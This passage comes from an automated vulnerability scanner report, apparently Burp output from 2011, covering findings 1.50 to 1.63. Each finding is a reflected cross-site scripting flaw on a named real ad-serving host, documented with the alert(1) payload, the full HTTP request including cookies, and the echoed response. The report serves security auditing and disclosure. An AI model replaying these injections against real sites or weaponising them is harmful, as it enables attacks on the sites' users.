User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "190076932ead<script>alert(1)</script>edf430560af"

   
                                                           </head>
...[SNIP]...

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload aa72b--><script>alert(1)</script>56c01c56ac8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549aa72b--><script>alert(1)</script>56c01c56ac8&pid=1900769&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3234


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1483549aa72b--><script>alert(1)</script>56c01c56ac8" -->
...[SNIP]...

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 98ad8--><script>alert(1)</script>818648b6a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=1900769&ps=-198ad8--><script>alert(1)</script>818648b6a&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3667


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-198ad8--><script>alert(1)</script>818648b6a" -->
       <
...[SNIP]...

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 3feb5<script>alert(1)</script>2e70b7c5226 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0D346790CFB88D71D4593A30AB7CE8C9; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:37:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226".replace(/[^\w\d]/g,""),"YpffvxtzOKuYhLCm_405295693feb5<script>
...[SNIP]...

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea33"-alert(1)-"3b4b2d0d84c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1570312&9ea33"-alert(1)-"3b4b2d0d84c=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:34:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 02:34:56 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9ea33"-alert(1)-"3b4b2d0d84c=1&Z=300x250&s=1570312&_salt=2802567516";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b714e'-alert(1)-'2181d872488 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 386
Expires: Sun, 13 Feb 2011 01:33:44 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc57b'-alert(1)-'40972d271a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:45 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 389
Expires: Sun, 13 Feb 2011 01:33:45 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ab782><script>alert(1)</script>6e76889d9da was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blankab782><script>alert(1)</script>6e76889d9da HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 321

<html><body><base target=_blankab782><script>alert(1)</script>6e76889d9da><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7
...[SNIP]...

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c14"><script>alert(1)</script>a4b96fa0e6e was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e;adiframe=y">
...[SNIP]...

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b69b0"><script>alert(1)</script>eeb789feb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 280

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank;adiframe=y">
...[SNIP]...

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 566fc><script>alert(1)</script>ed3badced5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&566fc><script>alert(1)</script>ed3badced5a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank&566fc><script>alert(1)</script>ed3badced5a=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C1
...[SNIP]...

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87299"><script>alert(1)</script>d8233ba9cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 329

<html><body><base target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1;adiframe=y">
...[SNIP]...

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2f4"><script>alert(1)</script>fe7203a0cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a3c"><script>alert(1)</script>9ea027e7c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3700"><script>alert(1)</script>c1d53990b82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
